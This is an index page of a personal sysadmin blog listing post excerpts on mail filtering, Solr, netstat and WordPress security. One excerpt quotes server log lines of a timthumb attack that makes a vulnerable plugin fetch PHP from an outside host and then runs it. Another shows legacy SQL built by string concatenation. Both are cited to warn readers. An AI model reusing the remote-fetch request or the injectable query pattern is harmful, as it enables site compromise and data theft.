Author: David Goodwin
-
Automated twitter compilation up to 24 January 2012
Arbitrary tweets made by TheGingerDog (i.e. David Goodwin) up to 24 January 2012
-
exim + spamassassin subject rewriting on symbiosis
One customer of mine has an Bytemark Symbiosis based exim mailserver which uses SpamAssassin. It works pretty well – however the : rewrite_header Subject *****SPAM***** directive in spamassassin (/etc/spamassassin/local.cf) seemed to be being ignored – and the only effect of the mail being classified as spam is/was a couple of additional headers added (X-Spam-Status: spam).…
-
State of the union – sort of (my 2011).
Well, perhaps not quite a State of the Union Address, but here’s a random update on my life in general which perhaps sums up the last year (as we’re almost at the end of the year, it’s probably fitting I somehow, somewhere write something like this). My children (Rowan and Anya) are both growing up…
-
SQL Injection with added magic_quotes assistance (the joys of legacy code maintenance)
Sometimes you really have to laugh (or shoot yourself) when you come across legacy code / the mess some other developer(s) left behind. (Names slightly changed to protect the innocent) class RocketShip { function rahrah() { $sql = “insert into foo (rah,rahrah,…) values ( ‘” . $this->escape_str($this->meh) . “‘, …… )”; mysqli_query($this->db_link, $sql) or…
-
Solr and WordPress (instructions/howto)
This is for Tomcat5.5 (on Debian Lenny), WordPress 3.1 and Solr 3.4. The intention is to use the solr-for-wordpress plugin (see github ). Lenny does include a Solr package (v1.2) which is somewhat outdated (and not supported by the upstream solr-for-wordpress wordpress plugin, hence we can’t use it). Install Tomcat (and Java) apt-get install sun-java6-jre…
-
netstat –tcp -lp output not showing a process id
I often use ‘netstat –tcp -lpn’ to display a list of open ports on a server – so i can check things aren’t listening where they shouldn’t be (e.g. MySQL accepting connections from the world) and so on. Obviously I firewall boxes; but I like to have a reasonable default incase the firewall decides to…
-
Automated twitter compilation up to 04 November 2011
Arbitrary tweets made by TheGingerDog (i.e. David Goodwin) up to 04 November 2011
-
Automated twitter compilation up to 11 September 2011
Arbitrary tweets made by TheGingerDog (i.e. David Goodwin) up to 11 September 2011
-
wp-mobile-detector is insecure (wordpress plugin)
It seems installing the wp-mobile-detector plugin on your wordpress site is a bad idea {tm} A customer’s web server has the following requests in it : [24/Aug/2011:02:10:47 +0100] “HEAD /wp-content/plugins/wp-mobile-detector/timthumb.php?src=http://superflickr.com.nu/index.php HTTP/1.1” 200 – “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU; rv:1.7.12) Gecko/20050919 Firefox/1.0.7” [24/Aug/2011:02:10:48 +0100] “GET /wp-content/plugins/wp-mobile-detector/cache/27a44a2d2bea4a693389c325a1125aa6.php HTTP/1.1” 200 52 “-” “Mozilla/5.0 (Windows; U;…
-
Automated twitter compilation up to 30 August 2011
Arbitrary tweets made by TheGingerDog (i.e. David Goodwin) up to 30 August 2011